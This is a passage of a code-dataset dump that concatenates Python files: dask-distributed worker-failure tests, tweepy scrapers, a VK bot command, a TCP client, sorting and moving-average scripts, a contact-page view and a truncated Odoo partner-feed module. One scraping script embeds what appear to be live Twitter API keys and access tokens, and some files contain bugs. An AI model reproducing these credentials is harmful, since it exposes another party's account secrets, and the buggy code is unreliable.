e:\n L = e.map(inc, range(10))\n wait(L)\n a['proc'].terminate()\n result = e.gather(L)\n assert result == list(map(inc, range(10)))\n\n\n@slow\ndef test_gather_then_submit_after_failed_workers(loop):\n with cluster(nworkers=4) as (s, [w, x, y, z]):\n with Executor(('127.0.0.1', s['port']), loop=loop) as e:\n L = e.map(inc, range(20))\n wait(L)\n w['proc'].terminate()\n total = e.submit(sum, L)\n wait([total])\n\n (_, port) = first(e.scheduler.who_has[total.key])\n for d in [x, y, z]:\n if d['port'] == port:\n d['proc'].terminate()\n\n result = e.gather([total])\n assert result == [sum(map(inc, range(20)))]\n\n\n@gen_cluster(Worker=Nanny, timeout=60, executor=True)\ndef test_failed_worker_without_warning(e, s, a, b):\n L = e.map(inc, range(10))\n yield _wait(L)\n\n a.process.terminate()\n start = time()\n while not a.process.is_alive():\n yield gen.sleep(0.01)\n assert time() - start < 10\n\n yield gen.sleep(0.5)\n\n start = time()\n while len(s.ncores) < 2:\n yield gen.sleep(0.01)\n assert time() - start < 10\n\n yield _wait(L)\n\n L2 = e.map(inc, range(10, 20))\n yield _wait(L2)\n assert all(len(keys) > 0 for keys in s.has_what.values())\n ncores2 = s.ncores.copy()\n\n yield e._restart()\n\n L = e.map(inc, range(10))\n yield _wait(L)\n assert all(len(keys) > 0 for keys in s.has_what.values())\n\n assert not (set(ncores2) & set(s.ncores)) # no overlap\n\n\n@gen_cluster(Worker=Nanny, executor=True)\ndef test_restart(e, s, a, b):\n assert s.ncores == {a.worker_address: 1, b.worker_address: 2}\n\n x = e.submit(inc, 1)\n y = e.submit(inc, x)\n z = e.submit(div, 1, 0)\n yield y._result()\n\n assert set(s.who_has) == {x.key, y.key}\n\n f = yield e._restart()\n assert f is e\n\n assert len(s.stacks) == 2\n assert len(s.processing) == 2\n\n assert not s.who_has\n\n assert x.cancelled()\n assert y.cancelled()\n assert z.cancelled()\n assert z.key not in s.exceptions\n\n assert not s.who_wants\n assert not s.wants_what\n\n\n@gen_cluster(Worker=Nanny, executor=True)\ndef test_restart_cleared(e, s, a, b):\n x = 2 * delayed(1) + 1\n f = e.compute(x)\n yield _wait([f])\n assert s.released\n\n yield e._restart()\n\n for coll in [s.tasks, s.dependencies, s.dependents, s.waiting,\n s.waiting_data, s.who_has, s.restrictions, s.loose_restrictions,\n s.released, s.priority, s.exceptions, s.who_wants,\n s.exceptions_blame]:\n assert not coll\n\n\ndef test_restart_sync_no_center(loop):\n with cluster(nanny=True) as (s, [a, b]):\n with Executor(('127.0.0.1', s['port']), loop=loop) as e:\n x = e.submit(inc, 1)\n e.restart()\n assert x.cancelled()\n y = e.submit(inc, 2)\n assert 
y.result() == 3\n assert len(e.ncores()) == 2\n\n\ndef test_restart_sync(loop):\n with cluster(nanny=True) as (s, [a, b]):\n with Executor(('127.0.0.1', s['port']), loop=loop) as e:\n x = e.submit(div, 1, 2)\n x.result()\n\n assert sync(loop, e.scheduler.who_has)\n e.restart()\n assert not sync(loop, e.scheduler.who_has)\n assert x.cancelled()\n assert len(e.ncores()) == 2\n\n with pytest.raises(CancelledError):\n x.result()\n\n y = e.submit(div, 1, 3)\n assert y.result() == 1 / 3\n\n\ndef test_restart_fast(loop):\n with cluster(nanny=True) as (s, [a, b]):\n with Executor(('127.0.0.1', s['port']), loop=loop) as e:\n L = e.map(sleep, range(10))\n\n start = time()\n e.restart()\n assert time() - start < 5\n assert len(e.ncores()) == 2\n\n assert all(x.status == 'cancelled' for x in L)\n\n x = e.submit(inc, 1)\n assert x.result() == 2\n\n\n@gen_cluster(Worker=Nanny, executor=True)\ndef test_fast_kill(e, s, a, b):\n L = e.map(sleep, range(10))\n\n start = time()\n yield e._restart()\n assert time() - start < 5\n\n assert all(x.status == 'cancelled' for x in L)\n\n x = e.submit(inc, 1)\n result = yield x._result()\n assert result == 2\n\n\n@gen_cluster(Worker=Nanny)\ndef test_multiple_executors_restart(s, a, b):\n e1 = Executor((s.ip, s.port), start=False)\n yield e1._start()\n e2 = Executor((s.ip, s.port), start=False)\n yield e2._start()\n\n x = e1.submit(inc, 1)\n y = e2.submit(inc, 2)\n xx = yield x._result()\n yy = yield y._result()\n assert xx == 2\n assert yy == 3\n\n yield e1._restart()\n\n assert x.cancelled()\n assert y.cancelled()\n\n yield e1._shutdown(fast=True)\n yield e2._shutdown(fast=True)\n\n\n@gen_cluster(Worker=Nanny, executor=True)\ndef test_forgotten_futures_dont_clean_up_new_futures(e, s, a, b):\n x = e.submit(inc, 1)\n yield e._restart()\n y = e.submit(inc, 1)\n del x\n import gc; gc.collect()\n yield gen.sleep(0.1)\n yield y._result()\n\n\n@gen_cluster(executor=True, timeout=60)\ndef test_broken_worker_during_computation(e, s, a, b):\n n = Nanny(s.ip, s.port, ncores=2, loop=s.loop)\n n.start(0)\n\n start = time()\n while len(s.ncores) < 3:\n yield gen.sleep(0.01)\n assert time() < start + 5\n\n L = e.map(inc, range(256))\n for i in range(8):\n L = e.map(add, *zip(*partition_all(2, L)))\n\n from random import random\n yield gen.sleep(random() / 2)\n n.process.terminate()\n yield gen.sleep(random() / 2)\n n.process.terminate()\n\n result = yield e._gather(L)\n assert isinstance(result[0], int)\n\n yield n._close()\n\n\n@gen_cluster(executor=True, Worker=Nanny)\ndef test_restart_during_computation(e, s, a, b):\n xs = [delayed(slowinc)(i, delay=0.01) for i in range(50)]\n ys = [delayed(slowinc)(i, delay=0.01) for i in xs]\n zs = [delayed(slowadd)(x, y, delay=0.01) for x, y in zip(xs, ys)]\n total = delayed(sum)(zs)\n result = e.compute(total)\n\n yield gen.sleep(0.5)\n assert s.rprocessing\n yield e._restart()\n assert not s.rprocessing\n\n assert len(s.ncores) == 2\n assert not s.task_state\n","sub_path":"distributed/tests/test_worker_failure.py","file_name":"test_worker_failure.py","file_ext":"py","file_size_in_byte":7175,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"424876437","text":"##!/usr/bin/python3.4\nimport sys\nsys.path.insert(0, '../master')\nimport database\n\nimport time\nimport configparser\nimport tweepy\nimport numpy as np\nnp.set_printoptions(threshold=np.nan)\nimport urllib.request as urllib2\n\nclass User_Features():\n def __init__(self, db, api):\n self.db = db\n self.api = api\n \n def check_Internet_Connection(self): \n #print('checking internet connection ....')\n status = \"ACTIVE\"\n try:\n urllib2.urlopen('https://twitter.com/', timeout=1)\n except urllib2.URLError:\n status = \"INACTIVE\"\n duration = 3\n print('INTERNET NOT PRESENT. It will Retry itself after '+str(duration)+' seconds')\n time.sleep(duration)\n self.check_Internet_Connection()\n return status\n \n def read_user_features(self):\n self.db.delete_user_based()\n \n verified_rank = 0\n url_exists_rank = 0\n desc_exists_rank = 0\n nr_tweets = 0\n nr_followers = 0\n nr_friends = 0\n user_row = \"0 0 0 0 0 0 0\" # these values will be removed as a removal of 1st row after the matrix creation\n data = \"\"\n\n cursor = self.db.get_ids_from_tweets()\n user_count = 0\n \n for row in cursor:\n tweetId = row[0]\n userId = row[1]\n user_count = user_count + 1\n print('User Count :'+str(user_count) +' | '+'Currently Processing for User :'+str(userId))\n\n try:\n status_value = self.check_Internet_Connection()\n if 'ACTIVE' in status_value:\n data = self.api.get_user(userId)\n else:\n while (status_value ==\"INACTIVE\"):\n self.check_Internet_Connection() \n except tweepy.TweepError:\n print('Information for tweet', tweetId,'cannot be retrieved and it was deleted from database') \n self.db.delete_tweet(tweetId)\n self.db.delete_from_content(tweetId)\n\n if \"True\" in str(data.verified):\n verified_rank = 1 # provide rank 1 if the user is a verified user\n else:\n verified_rank = 0 \n \n if data.description is not None:\n desc_exists_rank = 1 # provide rank 1 if the user account has description\n else:\n verified_rank = 0 \n \n if data.url is not None:\n url_exists_rank = 1 # provide rank 1 if the user account has url attached to the account\n else:\n verified_rank = 0 \n\n nr_tweets = data.statuses_count\n nr_followers = data.followers_count\n nr_friends = data.friends_count \n \n ##Create an array with the features\n features = [userId, verified_rank, desc_exists_rank, url_exists_rank, nr_tweets, nr_followers, nr_friends ]\n \n ##Call the method from database.py file\n self.db.insert_user_based(features)\n self.db.commit_db()\n \n user_row = user_row +' ;' +str(userId)+' ' +str(verified_rank)+' ' +str(desc_exists_rank)+' ' +str(url_exists_rank)+' '+str(nr_tweets)+' '+str(nr_followers)+' '+str(nr_friends)\n\n verified_rank = 0\n url_exists_rank = 0\n desc_exists_rank = 0\n nr_tweets = 0\n nr_followers = 0\n nr_friends = 0\n data = \"\"\n #print(user_row)\n\n user_matrix = np.matrix(user_row)\n user_matrix = np.delete(user_matrix, (0), axis=0)\n #User matrix is now stored in object user_matrix\n #print(user_matrix)\n return True\n\ndef main(db_name):\n print(\"\\n USER BASED ANALYSIS\\n\")\n ##establish the connection with the twitter api by reading credentials from config.ini file\n config = configparser.ConfigParser()\n config.read('../user.ini')\n \n consumer_key = config.get('Twitter', 'consumer_key')\n consumer_secret = config.get('Twitter', 'consumer_secret')\n access_token = config.get('Twitter', 'access_token')\n access_secret = config.get('Twitter', 'access_secret')\n\n auth = tweepy.OAuthHandler(consumer_key, consumer_secret)\n 
auth.set_access_token(access_token, access_secret)\n api = tweepy.API(auth, wait_on_rate_limit = True, wait_on_rate_limit_notify = True)\n\n db = database.main(db_name)\n db.connect()\n \n obj = User_Features(db, api)\n obj.check_Internet_Connection()\n obj.read_user_features()\n \n db.close_db()\n\nif __name__ == '__main__':\n main()\n","sub_path":"user-based/user_features.py","file_name":"user_features.py","file_ext":"py","file_size_in_byte":4728,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
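read_user_features accumulates the per-user rows in a semicolon-delimited string and then round-trips it through np.matrix, deleting the dummy first row afterwards. A sketch of the more direct list-of-rows construction follows (the two example rows are invented for illustration):

```python
import numpy as np

# Columns follow the `features` list above:
# [userId, verified, has_description, has_url, tweets, followers, friends]
rows = [
    [1001, 1, 1, 0, 5200, 340, 190],
    [1002, 0, 1, 1, 87, 12, 44],
]
user_matrix = np.array(rows)  # shape (2, 7); no dummy first row to delete
print(user_matrix.shape)
```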
+{"seq_id":"588500907","text":"from apps.API_VK.command.CommonCommand import CommonCommand\n\nMAX_QUOTES = 20\n\nclass Bash(CommonCommand):\n def __init__(self):\n names = [\"баш\"]\n help_text = \"Баш - рандомная цитата с баша\"\n detail_help_text = \"Баш [(N)] - рандомная цитата с баша. N - количество цитат. Максимум 25\"\n super().__init__(names, help_text, detail_help_text, int_args=[0])\n\n def start(self):\n quotes_count = 5\n if self.vk_event.args:\n self.parse_args('int')\n quotes_count = self.vk_event.args[0]\n self.check_number_arg_range(quotes_count, 1, MAX_QUOTES)\n return parse_bash(quotes_count)\n\n\ndef parse_bash(quotes_count):\n try:\n import requests\n from lxml import html\n r = requests.get('http://bash.im/random')\n doc = html.document_fromstring(r.text)\n html_quotes = doc.xpath('//*[@class=\"quotes\"]/article/div/div[@class=\"quote__body\"]')\n bash_quotes = []\n for i in range(quotes_count):\n html_quote = \"\\n\".join(html_quotes[i].xpath('text()'))\n bash_quotes.append(html_quote.strip('\\n').strip(' ').strip('\\n'))\n\n return \"\\n——————————————————\\n\".join(bash_quotes)\n except Exception as e:\n print(e)\n return \"Ошибка\"\n","sub_path":"apps/API_VK/command/commands/Bash.py","file_name":"Bash.py","file_ext":"py","file_size_in_byte":1386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"258820208","text":"#!/usr/bin/python\n\nfrom logger import logger\nfrom termcolor import colored\nimport sys\nimport socket\nimport threading\nimport queue\nimport subprocess\n\nclass tcpserver:\n\n\tdef __init__( self,\n\t\t\t\tlport = 2706,\n\t\t\t\trhost = \"google.com\",\n\t\t\t\trport = 80,\n\t\t\t\tbuffer_size = 4096,\n\t\t\t\tloglevel = 6,\n\t\t\t\tlogfile = None,\n\t\t\t\tq = None ):\n\n\t\tself.lport = lport\n\t\tself.rhost = rhost\n\t\tself.rport = rport\n\t\tself.buffer_size = buffer_size\n\t\tself.logfile = logfile\n\t\tself.loglevel = loglevel\n\t\tself.accept_msg = True\n\t\tself.log = None\n\t\tself.client_thread = None\n\t\tself.client_sock = None\n\t\tself.server_sock = None\n\t\tself.q = None\n\n\t\tif q is not None :\n\t\t\tself.q = q\n\t\telse :\n\t\t\tself.q = queue.Queue()\n\n\tdef __getmsgs ( self, q , buffer_size=4096 ):\n\n\t\t# Child function for getmessages\n\t\trecv_len = 1\n\t\tresponse = \"\"\n\n\t\twhile self.accept_msg:\n\n\t\t\twhile recv_len:\n\t\t\t\tbuffer = self.client_sock.recv ( buffer_size )\n\t\t\t\trecv_len = len ( buffer )\n\t\t\t\tresponse += buffer\n\n\t\t\t\tif recv_len < buffer_size:\n\t\t\t\t\tbreak;\n\n\t\t\tself.log.info ( str(response) )\n\t\t\tself.q.put ( response )\n\n\t\tq.put ( msgs )\n\t\treturn True\n\n\tdef start ( self ):\n\n\t\tself.log = logger ( verbose=self.loglevel , logfile=self.logfile, tmstp_date=False )\n\n\t\tself.log.info ( \"Starting full duplex communication\" )\n\n\t\tself.log.info ( \"Creating client sock\" )\n\t\tself.log.info ( \"Host : \" + self.log.green_mark ( self.rhost ) )\n\t\tself.log.info ( \"Port : \" + self.log.green_mark ( self.rport ) )\n\n\t\ttry:\n\t\t\tself.client_sock = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )\n\t\t\tself.client_sock.connect ( (self.rhost, self.rport) )\n\t\t\tself.log.success ( \"Connected to server.\" )\n\t\t\tself.log.info ( \"Start to listen.\" )\n\n\t\t\tself.client_thread = threading.Thread ( target=self.__getmsgs , args=[ self.q ,self.buffer_size ] )\n\t\t\tself.client_thread.start ()\n\n\t\texcept:\n\n\t\t\tself.log.danger ( \"TCP connection error\" )\n\t\t\tself.log.fail ( str (sys.exc_info()[1]) )\n\n\tdef transmit ( self , buffer ):\n\t\tif self.client_sock is not None and len(buffer):\n\t\t\tself.client_sock.send( buffer )\n\n\tdef getmessages ( self ):\n\t\treturn self.q.get()\n\n\n#d = tcpserver( loglevel = 6, logfile=\"pepe.log\" )\n#d.start()\n\n# Sending and reading a request \n#d.transmit (\"GET / HTTP/1.1\\r\\nHost: google.com\\r\\n\\r\\n\")\n#d.transmit (\"GET / HTTP/1.1\\r\\nHost: google.com\\r\\n\\r\\n\")\n#d.transmit (\"GET / HTTP/1.1\\r\\nHost: google.com\\r\\n\\r\\n\")\n\n#print d.getmessages () \n\n","sub_path":"myModules/tcpserver.py","file_name":"tcpserver.py","file_ext":"py","file_size_in_byte":2373,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"228927213","text":"def bubble_sort(seq):\n changed = True\n while True:\n if not changed:break\n changed = False\n for i in range(len(seq) - 1):\n if seq[i] > seq[i+1]:\n seq[i], seq[i+1] = seq[i+1], seq[i]\n changed = True\n return seq\n\n\nif __name__ == \"__main__\":\n n=int(input())\n seq=[]\n for i in range (0,n):\n seq.append(int(input()))\n seq=bubble_sort(seq)\n for x in seq:\n print(x)\n","sub_path":"[Contest]/[20150725]Magic-Lines-July-2015/Fixing-bubble-sort.py","file_name":"Fixing-bubble-sort.py","file_ext":"py","file_size_in_byte":449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"425149007","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Jan 15 22:30:06 2017\n\n@author: ShengliangDai\n\"\"\"\n\nimport pandas as pd\nimport tweepy\nfrom time import sleep\n\napi_key = \"tDTMJtC7sAz39hEj4rX5vb0sJ\" # <---- Add your API Key\napi_secret = \"5D9lXFpNr5Mpr8D4SQCak4pDH4NpzvyhmxXT4h5lxRYGqtfDHg\" # <---- Add your API Secret\naccess_token = \"1196013206-P6T1RgOl9Dwq70RUNXrczzjSxsuQtrlKimQBGmn\" # <---- Add your access token\naccess_token_secret = \"hBq8zik4WntPTB2hZEfSpVZNA0F7zAtj3mKjvb4GHyklz\" # <---- Add your access token secret\n\nauth = tweepy.OAuthHandler(api_key, api_secret)\nauth.set_access_token(access_token, access_token_secret)\n\napi = tweepy.API(auth)\n\nresults = []\nquery = [\"freezing rain\"]\nnum_search = 36\nfor n in range(num_search):\n print(\"The {} times search\".format(n))\n for tweet in tweepy.Cursor(api.search, q=query).items(500):\n results.append(tweet)\n if n == num_search - 1:\n break\n print(\"Sleep 20 minutes...{} times left\".format(num_search - 1 - n))\n sleep(1200)\n\ndef process_results(results):\n id_list = [tweet.id for tweet in results]\n data_set = pd.DataFrame(id_list, columns=[\"id\"])\n\n # Processing Tweet Data\n\n data_set[\"text\"] = [tweet.text for tweet in results]\n media = []\n expanded_url = []\n for tweet in results:\n if \"media\" in tweet.entities:\n for image in tweet.entities[\"media\"]:\n media.append(image[\"media_url\"])\n if 'video' in image[\"expanded_url\"]:\n expanded_url.append(image[\"expanded_url\"]) \n else:\n expanded_url.append(None)\n else:\n media.append(None)\n expanded_url.append(None)\n data_set[\"media_url\"] = media\n data_set[\"video_url\"] = expanded_url\n \n data_set[\"created_at\"] = [tweet.created_at for tweet in results]\n data_set[\"retweet_count\"] = [tweet.retweet_count for tweet in results]\n data_set[\"favorite_count\"] = [tweet.favorite_count for tweet in results]\n data_set[\"source\"] = [tweet.source for tweet in results]\n\n # Processing User Data\n data_set[\"user_id\"] = [tweet.author.id for tweet in results]\n data_set[\"user_screen_name\"] = [tweet.author.screen_name for tweet in results]\n data_set[\"user_name\"] = [tweet.author.name for tweet in results]\n data_set[\"user_created_at\"] = [tweet.author.created_at for tweet in results]\n data_set[\"user_description\"] = [tweet.author.description for tweet in results]\n data_set[\"user_followers_count\"] = [tweet.author.followers_count for tweet in results]\n data_set[\"user_friends_count\"] = [tweet.author.friends_count for tweet in results]\n data_set[\"user_location\"] = [tweet.author.location for tweet in results]\n data_set[\"user_coordinates\"] = [tweet.coordinates for tweet in results]\n\n return data_set\ndata_set = process_results(results)\ndata_set.to_csv(\"freezing rain-jan19.csv\")\nprint(\"Finish!\")","sub_path":"twitter-api/ice-storm-mining.py","file_name":"ice-storm-mining.py","file_ext":"py","file_size_in_byte":2898,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"86886302","text":"# Moving Averages Code\n\n# Load the necessary packages and modules\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport data.stock as st\n\n\n# Simple Moving Average \ndef SMA(data, ndays):\n SMA = pd.Series(data['close'].rolling(ndays).mean(), name='SMA')\n # SMA = pd.Series(pd.rolling_mean(data['close'], ndays), name='SMA')\n data = data.join(SMA)\n return data\n\n\n# Exponentially-weighted Moving Average\ndef EWMA(data, ndays):\n EMA = pd.Series(pd.DataFrame.ewm(data['close'],\n span=ndays,\n min_periods=ndays - 1).mean(),\n name='EWMA')\n data = data.join(EMA)\n return data\n\n\n# Retrieve the Nifty data from Yahoo finance:\n# XSHE000002_data = st.get_csv_data('000002.XSHE', 'price')\n# close = XSHE000002_data['close']\n#\n# # Compute the 50-day SMA for NIFTY\n# n = 50\n# SMA_NIFTY = SMA(XSHE000002_data, n)\n# SMA_NIFTY = SMA_NIFTY.dropna()\n# SMA = SMA_NIFTY['SMA']\n\n\ndef get_sma(stock_code, ndays):\n stock_data = st.get_csv_data(stock_code, 'price')\n sma_data = SMA(stock_data, ndays)\n sma_data = sma_data.dropna()\n return sma_data['SMA']\n\n\ndef get_ewma(stock_code, ndays):\n stock_data = st.get_csv_data(stock_code, 'price')\n ewma_data = EWMA(stock_data, ndays)\n ewma_data = ewma_data.dropna()\n return ewma_data['EWMA']\n\n# Compute the 200-day EWMA for NIFTY\n# ew = 200\n# EWMA_NIFTY = EWMA(XSHE000002_data, ew)\n# EWMA_NIFTY = EWMA_NIFTY.dropna()\n# EWMA = EWMA_NIFTY['EWMA_200']\n\n# Plotting the NIFTY Price Series chart and Moving Averages below\n# plt.figure(figsize=(9, 5))\n# plt.plot(XSHE000002_data['close'], lw=1, label='NSE Prices')\n# plt.plot(SMA, 'g', lw=1, label='50-day SMA (green)')\n# plt.plot(EWMA, 'r', lw=1, label='200-day EWMA (red)')\n# plt.legend(loc=2, prop={'size': 11})\n# plt.grid(True)\n# plt.setp(plt.gca().get_xticklabels(), rotation=30)\n# plt.show()\n","sub_path":"feature/MA.py","file_name":"MA.py","file_ext":"py","file_size_in_byte":1899,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"352603651","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /Users/Mardix/Dropbox/Projects/Python/harambe/harambe/contrib/views/contact_page.py\n# Compiled at: 2017-02-26 06:59:25\n\"\"\"\nContact Page\n\"\"\"\nfrom harambe import Harambe, _, get_config, url_for, abort, request, utils, flash_success, flash_error, flash_data, get_flash_data, send_mail, recaptcha, page_meta, redirect, decorators as deco, exceptions\nfrom harambe.contrib.app_option import AppOption\nimport logging\n__version__ = '1.0.0'\n__options__ = {}\n\nclass Main(Harambe):\n app_option = AppOption(__name__)\n\n @classmethod\n def _register(cls, app, **kwargs):\n \"\"\" Reset some params \"\"\"\n nav = __options__.get('nav', {})\n nav.setdefault('title', 'Contact')\n nav.setdefault('visible', True)\n nav.setdefault('order', 100)\n title = nav.pop('title')\n deco.nav_title.add(title, cls.index, **nav)\n kwargs['base_route'] = __options__.get('route', '/contact/')\n cls.app_option.init({'recipients': __options__.get('recipients'), \n 'success_message': __options__.get('success_message', 'Message sent. Thanks!')}, 'Contact Page Options')\n super(cls, cls)._register(app, **kwargs)\n\n @deco.route('/', methods=['GET', 'POST'])\n def index(self):\n recipients = self.app_option.get('recipients') or __options__.get('recipients') or get_config('CONTACT_EMAIL')\n if not recipients:\n abort(500, 'ContactPage missing email recipient')\n success_message = self.app_option.get('success_message') or __options__.get('success_message')\n return_to = __options__.get('return_to', None)\n if return_to:\n if '/' not in return_to:\n return_to = url_for(return_to)\n else:\n return_to = url_for(self)\n if request.method == 'POST':\n email = request.form.get('email')\n subject = request.form.get('subject')\n message = request.form.get('message')\n name = request.form.get('name')\n try:\n if recaptcha.verify():\n if not email or not subject or not message:\n raise exceptions.AppError('All fields are required')\n elif not utils.is_email_valid(email):\n raise exceptions.AppError('Invalid email address')\n else:\n try:\n send_mail(to=recipients, reply_to=email, mail_from=email, mail_subject=subject, mail_message=message, mail_name=name, template=__options__.get('template', 'contact-us.txt'))\n flash_data('ContactPage:EmailSent')\n except Exception as ex:\n logging.exception(ex)\n raise exceptions.AppError('Unable to send email')\n\n else:\n raise exceptions.AppError('Security code is invalid')\n except exceptions.AppError as e:\n flash_error(e.message)\n\n return redirect(self)\n else:\n title = __options__.get('title', _('Contact Us'))\n page_meta(title)\n fd = get_flash_data()\n return {'title': title, \n 'email_sent': True if fd and 'ContactPage:EmailSent' in fd else False, \n 'success_message': success_message, \n 'return_to': return_to}","sub_path":"pycfiles/Harambe-0.10.0.tar/contact_page.py","file_name":"contact_page.py","file_ext":"py","file_size_in_byte":3528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"380040277","text":"# -*- coding: utf-8 -*-\n##############################################################################\n# Copyright (c) 2021-Present IjVine Corporation ()\n\n##############################################################################\nfrom odoo import api,fields,models\nfrom odoo.addons.ijvine_ebay_base.tools import extract_list as EL\n\nfrom logging import getLogger\n_logger = getLogger(__name__)\n\nPartnerFields = [\n\t'name',\n\t'store_id',\n\n\t'email',\n\t'phone',\n\t'mobile',\n\t'website',\n\t'last_name',\n\t'street',\n\t'street2',\n\t'city',\n\t'zip',\n\t'state_id',\n\t'state_name',\n\t'country_id',\n\t'type',\n\t'parent_id'\n]\n\nclass PartnerFeed(models.Model):\n\t_name = 'partner.feed'\n\t_inherit = 'ijvine.feed'\n\t_description = 'Partner Feed'\n\n\temail = fields.Char('Email')\n\tphone = fields.Char('Phone')\n\tmobile = fields.Char('Mobile')\n\twebsite = fields.Char('Website URL')\n\tlast_name = fields.Char('Last Name')\n\tstreet = fields.Char('Street')\n\tstreet2 = fields.Char('street2')\n\tcity = fields.Char('City')\n\tzip = fields.Char('Zip')\n\tstate_name = fields.Char('State Name')\n\tstate_id = fields.Char('State Code')\n\tcountry_id = fields.Char('Country Code')\n\tparent_id = fields.Char('Store Parent ID')\n\ttype = fields.Selection(\n\t\tselection = [\n\t\t\t('contact','Contact'),\n\t\t\t('invoice','Invoice'),\n\t\t\t('delivery','Delivery'),\n\t\t],\n\t\tdefault = 'contact',\n\t\trequired = True\n\t)\n\n\t@api.model\n\tdef _create_feeds(self,partner_data_list):\n\t\tsuccess_ids,error_ids = [],[]\n\t\tself = self.contextualize_feeds('partner')\n\t\tfor partner_data in partner_data_list:\n\t\t\tfeed = self._create_feed(partner_data)\n\t\t\tif feed:\n\t\t\t\tself += feed\n\t\t\t\tsuccess_ids.append(partner_data.get('store_id'))\n\t\t\telse:\n\t\t\t\terror_ids.append(partner_data.get('store_id'))\n\t\treturn success_ids,error_ids,self\n\n\tdef _create_feed(self,partner_data):\n\t\tcontact_data_list = partner_data.pop('contacts',[])\n\t\tchannel_id = partner_data.get('channel_id')\n\t\tstore_id = str(partner_data.get('store_id'))\n\t\tfeed_id = self._context.get('partner_feeds').get(channel_id,{}).get(store_id)\n# Todo(Pankaj Kumar): Change feed field from state_id,country_id to state_code,country_code\n\t\tpartner_data['state_id'] = partner_data.pop('state_code',False)\n\t\tpartner_data['country_id'] = partner_data.pop('country_code',False)\n# & remove this code\n\t\ttry:\n\t\t\tif feed_id:\n\t\t\t\tfeed = self.browse(feed_id)\n\t\t\t\tpartner_data.update(state='draft')\n\t\t\t\tfeed.write(partner_data)\n\t\t\telse:\n\t\t\t\tfeed = self.create(partner_data)\n\t\texcept Exception as e:\n\t\t\t_logger.error(\n\t\t\t\t\"Failed to create feed for Customer: \"\n\t\t\t\tf\"{partner_data.get('store_id')}\"\n\t\t\t\tf\" Due to: {e.args[0]}\"\n\t\t\t)\n\t\telse:\n\t\t\tfor contact_data in contact_data_list:\n\t\t\t\tfeed+=self._create_feed(contact_data)\n\t\t\treturn feed\n\n\tdef import_partner(self,channel_id):\n\t\tself.ensure_one()\n\t\tmessage = \"\"\n\t\tstate = 'done'\n\t\tupdate_id = None\n\t\tcreate_id = None\n\n\t\tvals = EL(self.read(PartnerFields))\n\t\t_type =vals.get('type')\n\t\tstore_id = vals.pop('store_id')\n\t\tvals.pop('website_message_ids','')\n\t\tvals.pop('message_follower_ids','')\n\t\tmatch = channel_id.match_partner_mappings(store_id,_type)\n\t\tname = vals.pop('name')\n\t\tif not name:\n\t\t\tmessage+=\" Partner without name can't evaluated.\"\n\t\t\tstate = 'error'\n\t\tif not store_id:\n\t\t\tmessage+=\" Partner 
without store id can't evaluated.\"\n\t\t\tstate = 'error'\n\t\tparent_store_id = vals['parent_id']\n\t\tif parent_store_id:\n\t\t\tpartner_res = self.get_partner_id(parent_store_id,channel_id=channel_id)\n\t\t\tmessage += partner_res.get('message')\n\t\t\tpartner_id = partner_res.get('partner_id')\n\t\t\tif partner_id:\n\t\t\t\tvals['parent_id'] =partner_id.id\n\t\t\telse:\n\t\t\t\tstate = 'error'\n\t\tif state == 'done':\n\t\t\tcountry_id = vals.pop('country_id')\n\t\t\tif country_id:\n\t\t\t\tcountry_id = channel_id.get_country_id(country_id)\n\t\t\t\tif country_id:\n\t\t\t\t\tvals['country_id'] = country_id.id\n\t\t\tstate_id = vals.pop('state_id')\n\t\t\tstate_name = vals.pop('state_name')\n\n\t\t\tif (state_id or state_name) and country_id:\n\t\t\t\tstate_id = channel_id.get_state_id(state_id,country_id,state_name)\n\t\t\t\tif state_id:\n\t\t\t\t\tvals['state_id'] = state_id.id\n\t\t\tlast_name = vals.pop('last_name','')\n\t\t\tif last_name:\n\t\t\t\tvals['name'] = \"%s %s\" % (name, last_name)\n\t\t\telse:\n\t\t\t\tvals['name'] =name\n\t\tif match:\n\t\t\tif state =='done':\n\t\t\t\ttry:\n\t\t\t\t\tmatch.odoo_partner.write(vals)\n\t\t\t\t\tmessage +=' Partner %s successfully updated'%(name)\n\t\t\t\texcept Exception as e:\n\t\t\t\t\tmessage += ' %s' % (e)\n\t\t\t\t\tstate = 'error'\n\t\t\t\tupdate_id = match\n\n\t\t\telif state =='error':\n\t\t\t\tmessage+='Error while partner updated.'\n\n\t\telse:\n\t\t\tif state == 'done':\n\t\t\t\ttry:\n\t\t\t\t\terp_id = self.env['res.partner'].create(vals)\n\t\t\t\t\tcreate_id = channel_id.create_partner_mapping(erp_id, store_id,_type)\n\t\t\t\t\tmessage += ' Partner %s successfully evaluated.'%(name)\n\t\t\t\texcept Exception as e:\n\t\t\t\t\tmessage += ' %s' % (e)\n\t\t\t\t\tstate = 'error'\n\t\tself.set_feed_state(state=state)\n\t\tself.message = \"%s %s\" % (self.message, message)\n\t\treturn dict(\n\t\t\tcreate_id=create_id,\n\t\t\tupdate_id=update_id,\n\t\t\tmessage=message\n\t\t)\n\n\tdef import_items(self):\n\t\tself = self.contextualize_feeds('partner',self.mapped('channel_id').ids)\n\t\tself = self.contextualize_mappings('partner',self.mapped('channel_id').ids)\n\t\tupdate_ids=[]\n\t\tcreate_ids=[]\n\t\tmessage = ''\n\n\t\tfor record in self:\n\t\t\tchannel_id = record.channel_id\n\t\t\tsync_vals = dict(\n\t\t\tstatus ='error',\n\t\t\taction_on ='customer',\n\t\t\taction_type ='import',\n\t\t\t)\n\t\t\tres = record.import_partner(channel_id)\n\t\t\tmsz= res.get('message', '')\n\t\t\tmessage+=msz\n\t\t\tupdate_id = 